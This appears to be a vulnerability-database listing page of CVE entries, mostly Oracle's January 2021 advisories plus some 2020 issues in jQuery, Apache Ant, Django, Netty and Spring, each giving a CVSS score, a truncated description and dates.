Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attack
25-01-2021 - 20:58 20-01-2021 - 15:15
CVE-2021-2096 5.8
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network
25-01-2021 - 20:57 20-01-2021 - 15:15
CVE-2021-2097 5.8
Vulnerability in the Oracle iSupport product of Oracle E-Business Suite (component: Profile). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network acc
25-01-2021 - 20:54 20-01-2021 - 15:15
CVE-2021-2045 3.5
Vulnerability in the Oracle Text component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Session privilege with net
25-01-2021 - 20:54 20-01-2021 - 15:15
CVE-2021-2098 5.8
Vulnerability in the Oracle Email Center product of Oracle E-Business Suite (component: Message Display). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with
25-01-2021 - 20:52 20-01-2021 - 15:15
CVE-2021-2025 5.8
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web General). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable
25-01-2021 - 19:59 20-01-2021 - 15:15
CVE-2021-2026 5.8
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacke
25-01-2021 - 19:55 20-01-2021 - 15:15
CVE-2021-2027 5.8
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacke
25-01-2021 - 19:51 20-01-2021 - 15:15
CVE-2021-2033 4.0
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core Components). Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows low priv
25-01-2021 - 19:47 20-01-2021 - 15:15
CVE-2021-2089 5.8
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Runtime Catalog). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with netwo
25-01-2021 - 19:45 20-01-2021 - 15:15
CVE-2021-2091 5.8
Vulnerability in the Oracle Scripting product of Oracle E-Business Suite (component: Miscellaneous). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with netw
25-01-2021 - 19:44 20-01-2021 - 15:15
CVE-2021-2090 5.8
Vulnerability in the Oracle Email Center product of Oracle E-Business Suite (component: Message Display). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with
25-01-2021 - 19:44 20-01-2021 - 15:15
CVE-2021-2092 5.8
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker wit
25-01-2021 - 19:42 20-01-2021 - 15:15
CVE-2021-2093 5.8
Vulnerability in the Oracle Common Applications product of Oracle E-Business Suite (component: CRM User Management Framework). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthen
25-01-2021 - 19:42 20-01-2021 - 15:15
CVE-2021-2018 5.1
Vulnerability in the Advanced Networking Option component of Oracle Database Server. Supported versions that are affected are 18c and 19c. Difficult to exploit vulnerability allows unauthenticated attacker with network access via Oracle Net to compro
25-01-2021 - 17:32 20-01-2021 - 15:15
CVE-2021-2084 5.8
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker wit
25-01-2021 - 17:29 20-01-2021 - 15:15
CVE-2021-2085 5.8
Vulnerability in the Oracle CRM Technical Foundation product of Oracle E-Business Suite (component: Preferences). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker wit
25-01-2021 - 17:23 20-01-2021 - 15:15
CVE-2021-2023 4.3
Vulnerability in the Oracle Installed Base product of Oracle E-Business Suite (component: APIs). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network a
25-01-2021 - 17:06 20-01-2021 - 15:15
CVE-2021-2068 7.5
Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that are affected are 8.5.4 and 8.5.5. Easily exploitable vulnerability allows unauthenticated attacker with net
25-01-2021 - 16:06 20-01-2021 - 15:15
CVE-2021-2069 7.5
Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that are affected are 8.5.4 and 8.5.5. Easily exploitable vulnerability allows unauthenticated attacker with net
25-01-2021 - 16:00 20-01-2021 - 15:15
CVE-2021-2071 6.8
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Elastic Search). Supported versions that are affected are 8.56, 8.57 and 8.58. Difficult to exploit vulnerability allows unauthenticated attacker with net
25-01-2021 - 15:56 20-01-2021 - 15:15
CVE-2021-2017 4.0
Vulnerability in the Oracle User Management product of Oracle E-Business Suite (component: Proxy User Delegation). Supported versions that are affected are 12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows low privileged attacker wit
25-01-2021 - 15:54 20-01-2021 - 15:15
CVE-2021-2075 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Samples). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unau
25-01-2021 - 15:47 20-01-2021 - 15:15
CVE-2021-2077 5.8
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network
25-01-2021 - 15:43 20-01-2021 - 15:15
CVE-2021-2078 5.8
Vulnerability in the Oracle Configurator product of Oracle Supply Chain (component: UI Servlet). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to
25-01-2021 - 15:37 20-01-2021 - 15:15
CVE-2021-2080 5.8
Vulnerability in the Oracle Configurator product of Oracle Supply Chain (component: UI Servlet). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to
25-01-2021 - 15:33 20-01-2021 - 15:15
CVE-2021-2082 5.8
Vulnerability in the Oracle iStore product of Oracle E-Business Suite (component: Shopping Cart). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network
25-01-2021 - 15:33 20-01-2021 - 15:15
CVE-2021-2079 5.8
Vulnerability in the Oracle Configurator product of Oracle Supply Chain (component: UI Servlet). Supported versions that are affected are 12.1 and 12.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to
25-01-2021 - 15:33 20-01-2021 - 15:15
CVE-2021-2083 5.8
Vulnerability in the Oracle iSupport product of Oracle E-Business Suite (component: User Responsibilities). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker wi
25-01-2021 - 15:31 20-01-2021 - 15:15
CVE-2021-2015 5.8
Vulnerability in the Oracle Workflow product of Oracle E-Business Suite (component: Worklist). Supported versions that are affected are 12.2.3-12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to c
25-01-2021 - 15:23 20-01-2021 - 15:15
CVE-2021-2063 4.6
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with logon to the
25-01-2021 - 14:22 20-01-2021 - 15:15
CVE-2021-2064 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core Components). The supported version that is affected is 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access v
25-01-2021 - 14:20 20-01-2021 - 15:15
CVE-2021-2066 7.5
Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that are affected are 8.5.4 and 8.5.5. Easily exploitable vulnerability allows unauthenticated attacker with net
25-01-2021 - 14:18 20-01-2021 - 15:15
CVE-2021-2004 4.0
Vulnerability in the Siebel Core - Server BizLogic Script product of Oracle Siebel CRM (component: Integration - Scripting). Supported versions that are affected are 20.12 and prior. Easily exploitable vulnerability allows low privileged attacker wit
25-01-2021 - 14:17 20-01-2021 - 15:15
CVE-2021-2067 7.5
Vulnerability in the Oracle Outside In Technology product of Oracle Fusion Middleware (component: Outside In Filters). Supported versions that are affected are 8.5.4 and 8.5.5. Easily exploitable vulnerability allows unauthenticated attacker with net
25-01-2021 - 14:17 20-01-2021 - 15:15
CVE-2021-2029 7.5
Vulnerability in the Oracle Scripting product of Oracle E-Business Suite (component: Miscellaneous). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.8. Easily exploitable vulnerability allows unauthenticated attacker with netwo
23-01-2021 - 00:34 20-01-2021 - 15:15
CVE-2021-2013 6.5
Vulnerability in the Oracle BI Publisher product of Oracle Fusion Middleware (component: BI Publisher Security). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows low pr
22-01-2021 - 19:18 20-01-2021 - 15:15
CVE-2021-1994 7.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with netwo
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-2005 4.3
Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: BI Platform Security). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows un
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-2000 3.5
Vulnerability in the Unified Audit component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having SYS Account privilege with netwo
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1997 5.5
Vulnerability in the Oracle Hospitality Reporting and Analytics product of Oracle Food and Beverage Applications (component: Report). The supported version that is affected is 9.1.0. Easily exploitable vulnerability allows low privileged attacker wit
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1999 1.2
Vulnerability in the Oracle ZFS Storage Appliance Kit product of Oracle Systems (component: RAS subsystems). The supported version that is affected is 8.8. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastru
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-2003 4.9
Vulnerability in the Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Analytics Web Dashboards). Supported versions that are affected are 5.5.0.0.0, 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vul
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1996 3.5
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows high privileged attacker with netwo
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1993 2.1
Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Session privilege with network
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-1995 4.0
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Web Services). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows low privileged attacker with networ
22-01-2021 - 18:33 20-01-2021 - 15:15
CVE-2021-2043 None
Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Portal). Supported versions that are affected are 8.56, 8.57 and 8.58. Easily exploitable vulnerability allows unauthenticated attacker with network acces
20-01-2021 - 15:15 20-01-2021 - 15:15
CVE-2017-8028 5.1
In Pivotal Spring-LDAP versions 1.3.0 - 2.3.1, when connected to some LDAP servers, when no additional attributes are bound, and when using LDAP BindAuthenticator with org.springframework.ldap.core.support.DefaultTlsDirContextAuthenticationStrategy a
20-01-2021 - 15:15 27-11-2017 - 10:29
CVE-2020-11979 5.0
As mitigation for CVE-2020-1945 Apache Ant 1.10.8 changed the permissions of temporary files it created so that only the current user was allowed to access them. Unfortunately the fixcrlf task deleted the temporary file and created a new one without
01-10-2020 - 20:15 01-10-2020 - 20:15
CVE-2020-11023 4.3
In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may ex
01-10-2020 - 00:15 29-04-2020 - 21:15
CVE-2020-1945 3.3
Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files fr
30-09-2020 - 21:15 14-05-2020 - 16:15
CVE-2020-5421 6.5
In Spring Framework versions 5.2.0 - 5.2.8, 5.1.0 - 5.1.17, 5.0.0 - 5.0.18, 4.3.0 - 4.3.28, and older unsupported versions, the protections against RFD attacks from CVE-2015-5211 may be bypassed depending on the browser used through the use of a jses
30-09-2020 - 16:46 19-09-2020 - 04:15
CVE-2020-24750 6.8
FasterXML jackson-databind 2.x before 2.9.10.6 mishandles the interaction between serialization gadgets and typing, related to com.pastdev.httpcomponents.configuration.JndiConfiguration.
30-09-2020 - 13:48 17-09-2020 - 19:15
CVE-2020-1968 4.3
The Raccoon attack exploits a flaw in the TLS specification which can lead to an attacker being able to compute the pre-master secret in connections which have used a Diffie-Hellman (DH) based ciphersuite. In such a case this would result in the atta
26-09-2020 - 00:15 09-09-2020 - 14:15
CVE-2020-24584 5.0
An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). The intermediate-level directories of the filesystem cache had the system's standard umask rather than 0o077.
25-09-2020 - 20:15 01-09-2020 - 13:15
CVE-2020-24583 5.0
An issue was discovered in Django 2.2 before 2.2.16, 3.0 before 3.0.10, and 3.1 before 3.1.1 (when Python 3.7+ is used). FILE_UPLOAD_DIRECTORY_PERMISSIONS mode was not applied to intermediate-level directories created in the process of uploading file
25-09-2020 - 20:15 01-09-2020 - 13:15
CVE-2020-11612 7.5
The ZlibDecoders in Netty 4.1.x before 4.1.46 allow for unbounded memory allocation while decoding a ZlibEncoded byte stream. An attacker could send a large ZlibEncoded byte stream to the Netty server, forcing the server to allocate all of its free m
25-09-2020 - 20:15 07-04-2020 - 18:15
CVE-2020-11022 4.3
In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This prob
25-09-2020 - 20:15 29-04-2020 - 22:15
Back to Top Mark selected
Back to Top